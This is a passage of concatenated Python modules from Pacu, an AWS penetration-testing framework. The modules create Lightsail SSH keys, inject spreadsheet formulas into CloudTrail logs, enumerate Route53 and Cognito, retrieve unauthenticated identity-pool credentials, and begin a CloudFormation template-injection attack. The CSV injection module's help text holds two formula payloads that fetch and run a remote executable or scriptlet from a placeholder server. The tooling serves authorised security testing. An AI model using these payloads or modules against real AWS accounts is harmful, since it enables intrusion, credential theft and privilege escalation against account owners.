    'author': 'Alexander Morgenstern alexander.morgenstern@rhinosecuritylabs.com',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'EXPLOIT',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Creates SSH keys for available regions in AWS Lightsail.',

    # Full description about what the module does and how it works
    'description': 'This module creates SSH keys that can be used to connect to Lightsail instances. New keys can be created, or a public key file can be passed to import a pre-existing key.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['Lightsail'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # External resources that the module depends on. Valid options are either a GitHub URL (must end in .git) or single file URL.
    'external_dependencies': [],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': ['--key-name', '--import-key-file', '--regions'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--key-name', default='Pacu', required=False, help='Alias for imported/created key pair. Defaults to Pacu.')
parser.add_argument('--import-key-file', required=False, help='Import a key if specified, otherwise, create one.')
parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions in the format us-east-1. Defaults to all session regions.')


def main(args, pacu_main: 'Main'):
    session = pacu_main.get_active_session()
    print = pacu_main.print
    get_regions = pacu_main.get_regions

    args = parser.parse_args(args)
    created_keys = {}
    imported_keys = 0
    name = args.key_name
    regions = args.regions.split(',') if args.regions else get_regions('lightsail')

    for region in regions:
        print('Starting region {}...'.format(region))
        client = pacu_main.get_boto3_client('lightsail', region)
        try:
            if args.import_key_file is None:
                print('  Creating new key...')
                response = client.create_key_pair(keyPairName=name)
                created_keys[region] = {
                    'name': name,
                    'private': response['privateKeyBase64'],
                    'public': response['publicKeyBase64']
                }
            else:
                print('  Importing key...')
                try:
                    with open(args.import_key_file, 'r') as key_file:
                        key = key_file.read()
                except IOError:
                    print('Error opening key file.')
                    break
                response = client.import_key_pair(keyPairName=name, publicKeyBase64=key)
                print('    Key successfully imported for {}'.format(region))
                imported_keys += 1
        except ClientError as error:
            code = error.response['Error']['Code']
            if code == 'AccessDeniedException':
                print('    Unauthorized to add key pair to Lightsail.')
            elif 'already in use' in str(error):
                print('    Key name "{}" already in use.'.format(name))
                continue
            break
        except client.exceptions.InvalidInputException as error:
            print('Invalid key format provided.')
            break
    for region in created_keys:
        ssh_key_dir = os.path.join(downloads_dir(), module_info['name'], region)
        if not os.path.exists(ssh_key_dir):
            os.makedirs(ssh_key_dir)
        private_key_file_dir = os.path.join(ssh_key_dir, created_keys[region]['name'])
        public_key_file_dir = os.path.join(ssh_key_dir, created_keys[region]['name'] + '.pub')
        try:
            with open(private_key_file_dir, 'w') as private_key_file:
                private_key_file.write(created_keys[region]['private'])
            with open(public_key_file_dir, 'w') as public_key_file:
                public_key_file.write(created_keys[region]['public'])
        except IOError:
            print('Error writing key pair {} to file'.format(created_keys[region]['name']))
            continue

    summary_data = {
        'keys': len(created_keys.keys()),
        'imports': imported_keys
    }
    return summary_data


def summary(data, pacu_main):
    if data['imports'] > 0:
        out = '  {} key(s) imported'.format(data['imports'])
    else:
        out = '  {} key(s) created'.format(data['keys'])
    return out



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError

module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'cloudtrail__csv_injection',

    # Name and any other notes about the author
    'author': 'Spencer Gietzen of Rhino Security Labs',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'LATERAL_MOVE',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Inject malicious formulas/data into CloudTrail event history.',

    # Description about what the module does and how it works
    'description': 'This module will attempt to create a CloudTrail trail with a malicious Microsoft Excel and/or Google Sheets formula as the name as well as try to create an EC2 instance with the formula as the image ID. This is because a failed call won\'t work correctly. The failed events will be logged to CloudTrail\'s "Event history" page, where the past 90 days of API calls are listed. The logs can be exported to a .csv file, which due to the way that CloudTrail displays/exports the "Affected Resources" column, the formula we supply as a payload will attempt to execute. Payloads exist for both Microsoft Excel and Google Sheets. My blog post for this specific module is here: https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/. Further reading can be found here: https://www.we45.com/2017/02/14/csv-injection-theres-devil-in-the-detail/ and here: http://georgemauer.net/2017/10/07/csv-injection.html',

    # A list of AWS services that the module utilizes during its execution
    'services': ['CloudTrail'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': ['--regions', '--payload'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--regions', required=False, help='A comma-separated list of regions to target. The default is every region.')
parser.add_argument('--payload', required=True, help='The formula payload to use. Some examples:\n This formula uses PowerShell to contact an external server to download and execute a binary file: =cmd|\' /C powershell Invoke-WebRequest "http://your-server.com/test.exe" -OutFile "$env:Temp\\shell.exe"; Start-Process "$env:Temp\\shell.exe"\'!A1\nThis formula contacts a remote server to download and execute a .sct file: =MSEXCEL|\'\\..\\..\\..\\Windows\\System32\\regsvr32 /s /n /u /i:http://your-server.com/SCTLauncher.sct scrobj.dll\'!\'\'')


def main(args, pacu_main):
    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    get_regions = pacu_main.get_regions
    ######

    summary_data = {'success': 0, 'fails': 0}
    if args.regions:
        regions = args.regions.split(',')
    else:
        regions = get_regions('cloudtrail')

    for region in regions:
        print('Starting region {}...'.format(region))
        print('  Starting CreateTrail attack...')
        client = pacu_main.get_boto3_client('cloudtrail', region)
        try:
            client.create_trail(
                Name=args.payload,
                S3BucketName=args.payload
            )
            print('    FAILURE:')
            print('      Trail created. Payload fit the parameters for a valid trail name')
            print('      Exiting...')
            summary_data['fails'] += 1
            return summary_data
        except ClientError as error:
            code = error.response['Error']['Code']
            if code == 'InvalidTrailNameException':
                print('    Attack succeeded')
                summary_data['success'] += 1
                continue
            else:
                print('  FAILURE:')
                if code == 'AccessDeniedException':
                    print('    MISSING NEEDED PERMISSIONS')
                else:
                    print('    ' + str(code))

        print('  Starting RunInstances attack...')
        client = pacu_main.get_boto3_client('ec2', region)
        try:
            client.run_instances(
                ImageId=args.payload,
                MaxCount=1,
                MinCount=1
            )
            print('    FAILURE:')
            print('      Instance Launched. Payload fit the parameters for a valid ImageId')
            print('      Exiting...')
            summary_data['fails'] += 1
            return summary_data
        except ClientError as error:
            code = error.response['Error']['Code']
            if code == 'InvalidAMIID.Malformed':
                print('    Attack succeeded')
                summary_data['success'] += 1
                continue
            else:
                print('  FAILURE:')
                if code == 'AccessDeniedException':
                    print('    MISSING NEEDED PERMISSIONS')
                else:
                    print('    ' + str(code))
        summary_data['fails'] += 1
    return summary_data


def summary(data, pacu_main):
    out = '  {} CloudTrail regions(s) successfully attacked.\n'.format(data['success'])
    out += '  {} CloudTrail regions(s) failed to be attacked.\n'.format(data['fails'])
    return out



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError

module_info = {
    # Name of the module (should be the same as the filename).
    "name": "route53__enum",
    # Name and any other notes about the author.
    "author": "Aaron Rea - Scalesec",
    # Category of the module. Make sure the name matches an existing category.
    "category": "ENUM",
    # One liner description of the module functionality. This shows up when a
    # user searches for modules.
    "one_liner": "Enumerates Route53 hosted zones and query logging configurations",
    # Full description about what the module does and how it works.
    "description": "This module enumerates Route53 hosted zones across an account and correlates them with query logging configs for later use.",
    # A list of AWS services that the module utilizes during its execution.
    "services": ["Route53"],
    # For prerequisite modules, try and see if any existing modules return the
    # data that is required for your module before writing that code yourself;
    # that way, session data can stay separated and modular.
    "prerequisite_modules": [],
    # External resources that the module depends on. Valid options are either
    # a GitHub URL (must end in .git), or a single file URL.
    "external_dependencies": [],
    # Module arguments to autocomplete when the user hits tab.
    "arguments_to_autocomplete": ["--get_query_logging_config"],
}


parser = argparse.ArgumentParser(add_help=False, description=module_info["description"])


def get_hosted_zones(client):
    hosted_zones = []
    paginator = client.get_paginator("list_hosted_zones")
    for hosted_zone in paginator.paginate():
        hosted_zones += hosted_zone["HostedZones"]
    zones = {}

    if len(hosted_zones) > 0:
        for zone in hosted_zones:
            zid = zone["Id"].split("/")[2]
            print(
                f"ZoneID: {zid}  Name: {zone['Name']} Private: {zone['Config']['PrivateZone']} "
            )
            zones[zid] = zone
    else:
        print("No HostedZones found")

    return zones


def get_resource_record_sets_for_zone_id(client, hosted_zone_id):
    record_sets = {}
    all_records_for_zone = []
    paginator = client.get_paginator("list_resource_record_sets")
    for resource_records in paginator.paginate(HostedZoneId=hosted_zone_id):
        all_records_for_zone += resource_records["ResourceRecordSets"]
    record_sets[hosted_zone_id] = {"ResourceRecordSets": all_records_for_zone}
    if len(record_sets[hosted_zone_id]) > 0:
        print(f"ResourceRecordSets for {hosted_zone_id}:")
        for record in record_sets[hosted_zone_id]["ResourceRecordSets"]:
            print(f"Name: {record['Name']} Type: {record['Type']}")
    else:
        print("No ResourceRecordSets found")

    return record_sets


def get_query_logging_config(client):
    configs = client.list_query_logging_configs()["QueryLoggingConfigs"]

    if len(configs) > 0:
        print("QueryLoggingConfigs:")
        for con in configs:
            print(
                f"ZoneID: {con['HostedZoneId']} :: CloudWatchLogsLogGroupArn: {con['CloudWatchLogsLogGroupArn']}"
            )
    else:
        print("No QueryLoggingConfigs found")

    return configs


def zones_plus_config_and_records(zones, configs, records):
    for con in configs:
        if con["HostedZoneId"] in zones.keys():
            zones[con["HostedZoneId"]].update(
                {"CloudWatchLogsLogGroupArn": con["CloudWatchLogsLogGroupArn"]}
            )
            zones[con["HostedZoneId"]].update({"QueryLoggingConfigId": con["Id"]})
    for zone_id in records.keys():
        zones[zone_id].update(records[zone_id])

    return zones


def main(args, pacu_main):
    session = pacu_main.get_active_session()
    print = pacu_main.print
    args = parser.parse_args(args)

    try:
        client = pacu_main.get_boto3_client("route53")
    except ClientError as error:
        print(f"Failed to initialize boto client for route53: {error}")

    data = {}

    try:
        zones = get_hosted_zones(client=client)
    except ClientError as error:
        print(f"Failed to list R53 Hosted Zones: {error}")
        return

    try:
        confs = get_query_logging_config(client=client)
    except ClientError as error:
        print(f"Failed to list R53 Hosted Zone Query Logging Configurations: {error}")
        return

    records = {}
    for hosted_zone_id in zones.keys():
        try:
            records_for_zone = get_resource_record_sets_for_zone_id(
                client=client, hosted_zone_id=hosted_zone_id
            )
        except ClientError as error:
            print(f"Failed to list R53 Resource Record Sets: {error}")
            continue
        records.update(records_for_zone)

    data = zones_plus_config_and_records(zones=zones, configs=confs, records=records)

    session.update(pacu_main.database, Route53=data)

    return data


def summary(data, pacu_main):
    if len(data) > 0:
        hosted_zone_count = len(data)
        total_records = 0
        for zone_id in data.keys():
            total_records += data[zone_id]["ResourceRecordSetCount"]
        return f"Found {hosted_zone_count} hosted zones.\nFound {total_records} resource records."
    else:
        return "No hosted zones found."



import argparse
from copy import deepcopy
from random import choice


from pacu.core.lib import save
from botocore.exceptions import ClientError
from pacu.core.secretfinder.utils import regex_checker, Color

#Using Spencer's iam_enum.py as a template

module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'cognito__enum',

    # Name and any other notes about the author
    'author': 'David Kutz-Marks of Rhino Security Labs',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'ENUM',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Enumerates Cognito information in the current AWS account.',

    # Description about what the module does and how it works
    'description': 'The module is used to enumerate the following Cognito data in the current AWS account: users, user pool clients, user pools and identity pools. By default, all data will be enumerated, but if any arguments are passed in indicating what data to enumerate, only that specified data will be enumerated.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['cognito-idp', 'cognito-identity'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself; that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # External resources that the module depends on. Valid options are either a GitHub URL (must end in .git) or single file URL.
    'external_dependencies': [],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': [
        '--regions',
        '--user_pools',
        '--user_pool_clients'
        '--identity_pools'
        '--users' 
    ],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--regions', required=False, default=None, help='One or more (comma-separated) AWS regions in the format "us-east-1". Defaults to all session regions.')
parser.add_argument('--user_pools', required=False, default=False, action='store_true', help='Enumerate Cognito user pools')
parser.add_argument('--user_pool_clients', required=False, default=False, action='store_true', help='Enumerate Cognito user pool clients')
parser.add_argument('--identity_pools', required=False, default=False, action='store_true', help='Enumerate Cognito identity pools')
parser.add_argument('--users', required=False, default=False, action='store_true', help='Enumerate users in each user pool')
ARG_FIELD_MAPPER = {
    'user_pools': 'UserPools',
    'user_pool_clients':'UserPoolClients',
    'identity_pools': 'IdentityPools',
    'users': 'Users'
}


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    args = parser.parse_args(args)
    print = pacu_main.print
    get_regions = pacu_main.get_regions

    if args.user_pools is False and args.user_pool_clients is False and args.identity_pools is False and args.users is False:
        args.user_pools = args.identity_pools = args.users = args.user_pool_clients = True

    if args.regions is None:
        regions = get_regions('cognito-idp')
        if regions is None or regions == [] or regions == '' or regions == {}:
            print('This module is not supported in any regions specified in the current sessions region set. Exiting...')
            return
    else:
        regions = args.regions.split(',')

    all_user_pools = []
    all_user_pool_clients = []
    all_identity_pools = []
    all_users_in_pools = []
    for region in regions:
        user_pools = []
        user_pool_clients = []
        identity_pools = []
        users_in_pools = []
       

        if any([args.user_pools, args.identity_pools,args.user_pool_clients, args.users]):
            print('Starting region {}...'.format(region))
        client = pacu_main.get_boto3_client('cognito-idp', region)

        
        try:
            # User Pools
            if args.user_pools:
                client = pacu_main.get_boto3_client('cognito-idp', region)
                response = None
                next_token = False
                while (response is None or 'NextToken' in response):
                    if next_token is False:
                        try:
                            response = client.list_user_pools(
                                MaxResults=60 #60 is maximum
                            )
                        except ClientError as error:
                            code = error.response['Error']['Code']
                            print('Unable to list user pools in this region (this is normal if the region is disabled in the account): ')
                            if code == 'UnauthorizedOperation':
                                print('  Access denied to ListUserPools.')
                            else:
                                print('  ' + code)
                            print('  Skipping user pool enumeration...')
                            
                    else:
                        response = client.list_user_pools(
                            NextToken=next_token,
                            MaxResults=60 #60 is maximum
                        )
                    if 'NextToken' in response:
                        next_token = response['NextToken']
                    for userpool in response['UserPools']:
                        print('Scanning user pool ' + userpool['Id'] + ' for vulnerabilities.')
                        userpool['Region'] = region
                        userpool['Description'] = client.describe_user_pool(UserPoolId=userpool['Id'])
                        password_policy = userpool['Description']['UserPool']['Policies']['PasswordPolicy']
                        if password_policy:                                      
                            if password_policy['MinimumLength'] < 12 or password_policy['RequireLowercase'] is False or password_policy['RequireUppercase'] is False or password_policy['RequireNumbers'] is False or password_policy['RequireSymbols'] is False:
                                print('Weak password policy!')
                                if password_policy['MinimumLength'] < 12:
                                    print('Minimum password length is fewer than 12 characters (' + str(password_policy['MinimumLength']) + ').')
                                if password_policy['RequireLowercase'] is False:
                                    print('Password does not require a lowercase letter.')
                                if password_policy['RequireUppercase'] is False:
                                    print('Password does not require an uppercase letter.')
                                if password_policy['RequireNumbers'] is False:
                                    print('Password does not require a number.')
                                if password_policy['RequireSymbols'] is False:
                                    print('Password does not require a symbol.')
                        if userpool['Description']['UserPool']['MfaConfiguration'] == 'OFF' or userpool['Description']['UserPool']['MfaConfiguration'] == 'OPTIONAL':
                            print('MFA is not required for user pool: ' + userpool['Id'] + '.')
                        user_pools.append(userpool)
                print('  {} user pool(s) found.'.format(len(user_pools)))
                all_user_pools += user_pools

            if args.identity_pools:
                client = pacu_main.get_boto3_client('cognito-identity', region)
                response = None
                next_token = False
                while (response is None or 'NextToken' in response):
                    if next_token is False:
                        try:
                            response = client.list_identity_pools(
                                MaxResults=60  # 60 is maximum
                            )
                        except ClientError as error:
                            code = error.response['Error']['Code']
                            print('FAILURE: ')
                            if code == 'UnauthorizedOperation':
                                print('  Access denied to ListIdentityPools.')
                            else:
                                print('  ' + code)
                            print('  Skipping identity pool enumeration...')
                            
                    else:
                        response = client.list_identity_pools(
                            NextToken=next_token,
                            MaxResults=60  # 60 is maximum
                        )
                    if 'NextToken' in response:
                        next_token = response['NextToken']
                    for identity_pool in response['IdentityPools']:
                        identity_pool['Region'] = region
                        print("Scanning identity pool " + identity_pool['IdentityPoolId'] + " for vulnerabilities.")
                        print("Attempting unauthenticated retrieval of identity Id")
                        try:
                            identity_id = client.get_id(
                                IdentityPoolId=identity_pool["IdentityPoolId"]
                            )
                            if identity_id is not None:
                                print("Identity id successfully retrieved: " + identity_id["IdentityId"])
                            print(
                            "Attempting unauthenticated retrieval of identity Id credentials"
                            )
                            identity_creds = client.get_credentials_for_identity(
                            IdentityId=identity_id["IdentityId"]
                        )      
                            if identity_creds["Credentials"]["AccessKeyId"] is not None:
                                print("Access Key ID found.")
                                identity_pool["AccessKeyId"] = identity_creds["Credentials"][
                                    "AccessKeyId"
                                ]
                                print(identity_pool["AccessKeyId"])
                            if identity_creds["Credentials"]["SecretKey"] is not None:
                                print("Secret Key found.")
                                identity_pool["SecretKey"] = identity_creds["Credentials"]["SecretKey"]
                                print(identity_pool["SecretKey"])
                            if identity_creds["Credentials"]["SessionToken"] is not None:
                                print("Session Token found.")
                                identity_pool["SessionToken"] = identity_creds["Credentials"][
                                    "SessionToken"
                                ]
                                print(identity_pool["SessionToken"])
                            if identity_creds["Credentials"]["Expiration"] is not None:
                                print("Expiration found.")
                                identity_pool["Expiration"] = identity_creds["Credentials"][
                                    "Expiration"
                                ]
                                print(identity_pool["Expiration"])  
                        except ClientError as error:
                            print("FAILURE: ")
                            code = error.response["Error"]["Code"]
                            print("  " + code)              
                        try:      
                            identity_pool['Roles'] = client.get_identity_pool_roles(IdentityPoolId=identity_pool['IdentityPoolId'])
                        except ClientError as error:
                            code = error.response['Error']['Code']
                            if code == 'UnauthorizedOperation':
                                print('  Access denied to GetIdentityPoolRoles.')
                            else:
                                print('  ' + code)
                        identity_pool['PrincipalTagAttributes'] = []
                        for user_pool in user_pools:
                            try:
                                identity_provider_name = str('cognito-idp.' + region + '.amazonaws.com/' + user_pool['Id'])
                                try:
                                    identity_pool_principal_tag_attributes = client.get_principal_tag_attribute_map(IdentityPoolId=identity_pool['IdentityPoolId'], IdentityProviderName=identity_provider_name)
                                except Exception as e:
                                    print(f"Error: {e}")
                                    identity_pool_principal_tag_attributes = None
                                if identity_pool_principal_tag_attributes is not None:
                                    identity_pool['PrincipalTagAttributes'].append(identity_pool_principal_tag_attributes)
                            except ClientError as error:
                                code = error.response['Error']['Code']
                                if code == 'UnauthorizedOperation':
                                    print('  Access denied to GetPrincipalTagAttributeMap.')
                                elif code == 'ResourceNotFoundException':
                                    print('No principal tags configured for user pool IdP' + identity_provider_name)
                                else:
                                    print('  ' + code)
                                print('  Skipping identity pool principal tag attribute enumeration...')                
                        identity_pools.append(identity_pool)
                print('  {} identity pool(s) found.'.format(len(identity_pools)))
                all_identity_pools += identity_pools

            # User Pool Clients
            if args.user_pool_clients:
                for user_pool in user_pools:
                    client = pacu_main.get_boto3_client('cognito-idp', region)
                    next_token = None
                    while True:
                        try:
                            print(f"Trying to list user pool clients for UserPoolId: {user_pool['Id']}")
                            if next_token is None:
                                response = client.list_user_pool_clients(
                                    UserPoolId=user_pool['Id'],
                                    MaxResults=60
                                )
                            else:
                                response = client.list_user_pool_clients(
                                    UserPoolId=user_pool['Id'],
                                    MaxResults=60,
                                    NextToken=next_token
                                )
                            for user_pool_client in response['UserPoolClients']:
                                resource_server_scopes = []
                                client_info = {}
                                print('User pool client found.')
                                print('Scanning user pool client ' + user_pool_client['ClientId'] + ' in user pool ' + user_pool['Id'] + ' for vulnerabilities.')
                                try:
                                    client_info['ClientId'] = user_pool_client['ClientId']
                                    client_info['UserPoolId'] = user_pool_client['UserPoolId']
                                    client_info['Region'] = region
                                    client_info['Description'] = client.describe_user_pool_client(UserPoolId=user_pool_client['UserPoolId'], ClientId=user_pool_client['ClientId'])
                                    resource_servers = []
                                    next_token_resource = None
                                except error as e:
                                    print(f"Error: {e}")
                                    resource_servers = []
                                    next_token_resource = None
                                except ClientError as error:
                                    print('FAILURE: ')
                                    code = error.response['Error']['Code']
                                while True:
                                    if next_token_resource is None:
                                        resource_servers_response = client.list_resource_servers(UserPoolId=user_pool_client['UserPoolId'], MaxResults=50)
                                    else:
                                        resource_servers_response = client.list_resource_servers(UserPoolId=user_pool_client['UserPoolId'], MaxResults=50, NextToken=next_token_resource)
                                    resource_servers.extend(resource_servers_response['ResourceServers'])
                                    next_token_resource = resource_servers_response.get('NextToken')
                                    if next_token_resource is None:
                                        break
                                try:
                                    for resource_server in resource_servers:
                                        if 'Scopes' in resource_server:
                                            for scope in resource_server['Scopes']:
                                                resource_server_scopes.append(scope['ScopeName'])
                                except Exception as error:
                                    code = error.response['Error']['Code']
                                    if code == 'UnauthorizedOperation':
                                        print('  Access denied to ListResourceServers.')
                                    else:
                                        print('  ' + code)
                                    print('  Skipping resource server enumeration...')
                                if resource_servers:    
                                    user_pool['Description']['UserPool']['ResourceServers'] = resource_servers
                                try:
                                    if client_info.get('Description') and client_info['Description'].get('UserPoolClient') and client_info['Description']['UserPoolClient'].get('WriteAttributes'):
                                        write_attributes = client_info['Description']['UserPoolClient']['WriteAttributes']
                                    else:
                                        write_attributes = []
                                except Exception as error:
                                    code = error.response['Error']['Code']
                                    if code == 'UnauthorizedOperation':
                                        print('  Access denied to ListResourceServers.')
                                    else:
                                        print('  ' + code)
                                    print('  Skipping resource server enumeration...')
                                except error as e:
                                    print(f"Error: {e}")
                                if user_pool.get('Description') and user_pool['Description'].get('UserPool') and user_pool['Description']['UserPool'].get('UserAttributeUpdateSettings') and user_pool['Description']['UserPool']['UserAttributeUpdateSettings'].get('AttributesRequireVerificationBeforeUpdate'):
                                    verify_attributes = user_pool['Description']['UserPool']['UserAttributeUpdateSettings']['AttributesRequireVerificationBeforeUpdate']
                                if client_info.get('Description') and client_info['Description'].get('UserPoolClient') and client_info['Description']['UserPoolClient'].get('AllowedOAuthScopes'):
                                    client_scopes = client_info['Description']['UserPoolClient']['AllowedOAuthScopes']
                                identity_attributes = []
                                identity_claims = []
                                for identity_pool in identity_pools:
                                    if identity_pool.get('PrincipalTagAttributes') and identity_pool['PrincipalTagAttributes'].get('PrincipalTags'):
                                        identity_attributes.append(identity_pool['PrincipalTagAttributes']['PrincipalTags'])
                                    if identity_pool.get('Roles') and identity_pool['Roles'].get('RoleMappings') and identity_pool['Roles']['RoleMappings'].get('RulesConfiguration') and identity_pool['Roles']['RoleMappings']['RulesConfiguration'].get('Rules') and identity_pool['Roles']['RoleMappings']['RulesConfiguration']['Rules'].get('Claim'): 
                                        identity_claims.append(identity_pool['Roles']['RoleMappings']['RulesConfiguration']['Rules']['Claim'])
                                user_writable_attributes = []
                                client_scope_user_writable_attributes = []
                                resource_server_scope_user_writable_attributes = []
                                identity_attributes_user_writable_attributes = []
                                identity_claims_user_writable_attributes = []
                                verify_attributes = []
                                if user_pool.get('Description') and user_pool['Description'].get('UserPool') and user_pool['Description']['UserPool'].get('SchemaAttributes'):                              
                                    for schema_attribute in user_pool['Description']['UserPool']['SchemaAttributes']:
                                        try:
                                            if write_attributes:
                                                if schema_attribute['Name'] in write_attributes:
                                                    if schema_attribute['DeveloperOnlyAttribute'] is False and schema_attribute['Mutable'] is True:
                                                        user_writable_attributes.append(schema_attribute['Name'])
                                        except Exception as e:
                                            print(f"Error: {e}")
                                if user_writable_attributes:
                                    print('The following attributes can be modified by users: ' + str(user_writable_attributes))
                                    client_scope_user_writable_attributes = [
                                        attr for attr in user_writable_attributes
                                        if any(
                                            attr == scope or attr.replace('custom:', '') == scope.split('/')[-1] 
                                            for scope in client_scopes
                                        )
                                    ]
                                    resource_server_scope_user_writable_attributes = [attr for attr in user_writable_attributes if attr in resource_server_scopes or attr.replace('custom:', '') in resource_server_scopes]
                                    identity_attributes_user_writable_attributes = [attr for attr in user_writable_attributes if attr in identity_attributes or attr.replace('custom:', '') in identity_attributes]
                                    identity_claims_user_writable_attributes = [attr for attr in user_writable_attributes if attr in identity_claims or attr.replace('custom:', '') in identity_claims]
                                for user_writable_attribute in user_writable_attributes:
                                    if user_writable_attribute == 'phone_number':  
                                        if user_writable_attribute not in verify_attributes:
                                            print('Attribute \'phone_number\' does not require verification before changing!')
                                    if user_writable_attribute == 'email':  
                                        if user_writable_attribute not in verify_attributes:
                                            print('Attribute \'email\' does not require verification before changing!')
                                if resource_server_scope_user_writable_attributes:
                                    print('The following attributes can be modified by users and are used for access control by a resource server (this may allow privilege escalation): ' + str(resource_server_scope_user_writable_attributes))
                                else:
                                    print('No resource servers found.')
                                if identity_attributes_user_writable_attributes:
                                    print('The following attributes can be modified by users and are used for access control by an identity pool (this may allow privilege escalation): ' + str(identity_attributes_user_writable_attributes))
                                else:
                                    print('No identity pools found.')
                                if identity_claims_user_writable_attributes:
                                    print('The following attributes can be modified by users and may be used for access control by an identity pool rule (this may allow privilege escalation): ' + str(identity_claims_user_writable_attributes))
                                else:
                                    print('No identity pools found.')
                                user_pool_clients.append(client_info)                         
                            if not response.get('NextToken'):
                                break
                        except ClientError as error:
                            code = error.response['Error']['Code']
                            print('FAILURE: ')
                            if code == 'UnauthorizedOperation':
                                print('  Access denied to ListUserPoolClients.')
                            elif code == 'InvalidParameterException':  # Add this block
                                print('  InvalidParameterException')
                                print(f"  UserPoolId causing the issue: {user_pool['Id']}")
                                break
                            else:
                                print('  ' + code)
                            print('  Skipping user pool client enumeration...')
                            break
                    try:
                        print(f'  {len(user_pool_clients)} user pool client(s) found in user pool {user_pool["Id"]}.')
                    except Exception as e:
                        print(f"Error: {e}")
                    all_user_pool_clients += user_pool_clients

        
            # List Users in each User Pool
            if args.users:
                for user_pool in user_pools:
                    client = pacu_main.get_boto3_client('cognito-idp', region)
                    response = None
                    iterate = 0
                    pagination_token = ''
                    while (iterate == 0 or 'PaginationToken' in response):
                        try:
                            iterate += 1
                            print(f"Trying to list users for UserPoolId: {user_pool['Id']}")  # Add this line
                            response = client.list_users(
                                UserPoolId=user_pool['Id'],
                                Limit=60,
                                PaginationToken=pagination_token
                            ) if pagination_token else client.list_users(
                                UserPoolId=user_pool['Id'],
                                Limit=60
                            )
                            pagination_token = response['PaginationToken'] if 'PaginationToken' in response else ''

                            for user in response['Users']:
                                user['UserPoolId'] = user_pool['Id']
                                user['Region'] = region
                                users_in_pools.append(user)

                        except ClientError as error:
                            code = error.response['Error']['Code']
                            print('FAILURE: ')
                            if code == 'UnauthorizedOperation':
                                print('  Access denied to ListUsers.')
                            elif code == 'InvalidParameterException':  # Add this block
                                print('  InvalidParameterException')
                                print(f"  UserPoolId causing the issue: {user_pool['Id']}")
                                break
                            else:
                                print('  ' + code)
                            print('  Skipping user enumeration...')

                print(f'  {len(users_in_pools)} user(s) found in user pool {user_pool["Id"]}.')
                all_users_in_pools += users_in_pools

        except Exception:
            continue
 
    gathered_data = {
        'UserPools': all_user_pools,
        'UserPoolClients': all_user_pool_clients,
        'IdentityPools': all_identity_pools,
        'UsersInPools': all_users_in_pools
    }

    for var in vars(args):
        if var == 'regions':
            continue
        if not getattr(args, var):
            if ARG_FIELD_MAPPER[var] in gathered_data:
                del gathered_data[ARG_FIELD_MAPPER[var]]

    cognito_data = deepcopy(session.Cognito)
    for key, value in gathered_data.items():
        cognito_data[key] = value
    session.update(pacu_main.database, Cognito=cognito_data)

    # Add regions to gathered_data for summary output
    gathered_data['regions'] = regions

    if any([args.user_pools, args.identity_pools]):
        return gathered_data
    else:
        print('No data successfully enumerated.\n')
        return None


def summary(data, pacu_main):
    results = []

    results.append('  Regions:')
    for region in data['regions']:
        results.append('     {}'.format(region))

    results.append('')

    if 'UserPools' in data:
        results.append('    {} total user pool(s) found.'.format(len(data['UserPools'])))

    if 'UserPoolClients' in data:
        results.append('    {} total user pool client(s) found.'.format(len(data['UserPoolClients'])))

    if 'IdentityPools' in data:
        results.append('    {} total identity pool(s) found.'.format(len(data['IdentityPools'])))

    if 'UsersInPools' in data:
        results.append('    {} total user(s) in user pool(s) found.'.format(len(data['UsersInPools'])))

    return '\n'.join(results)


#!/usr/bin/env python3
import argparse
import json
import os
import shutil
import subprocess
from pathlib import Path
from typing import TYPE_CHECKING, cast

import boto3
import botocore.exceptions
from botocore.exceptions import ClientError

from pacu import Main
from pacu.core.lib import module_data_dir, PacuException
from pacu.core.models import AWSKey


if TYPE_CHECKING:
    import mypy_boto3_s3
    import mypy_boto3_lambda

    from mypy_boto3_s3.type_defs import NotificationConfigurationTypeDef, \
        NotificationConfigurationResponseMetadataTypeDef

module_info = {
    'name': 'cfn__resource_injection',
    'author': 'Ryan Gerstenkorn of Rhino Security Labs',
    'category': 'ESCALATE',
    'one_liner': "Resource Injection in CloudFormation Templates",
    'description': '''
        Given an S3 bucket used for storing CloudFormation templates to be deployed this module will set up the S3 bucket
        notifications to trigger a lambda in another account when these templates are uploaded. This lambda will then
        inject an IAM admin role into the template, assuming this modification happens before the template is deployed,
        the user deploying is an admin, as well as deploys with the CAPABILITY_IAM permission (this more than likely
        the case) our IAM role will be deployed with the rest of the resources.

        Currently, it takes just under a second for templates to be updated so this module will be most effective
        against deployment processes that have some delay between the upload and deploy steps. The CloudFormation
        console wizard is a good target for this, however, there may be other cases that work here as well.
        
        After our IAM role is deployed it will have a trust role policy set up to allow AssumeRole from the IAM identity
        specified by the '--principal' argument, if this isn't specified the principal will be the root principal
        of the account used for the '--attacker-key' credentials.

        The '--*-key' arguments should reference Pacu credentials set up through 'set_keys'. There are a few separate
        credentials needed for this module, these are described below.

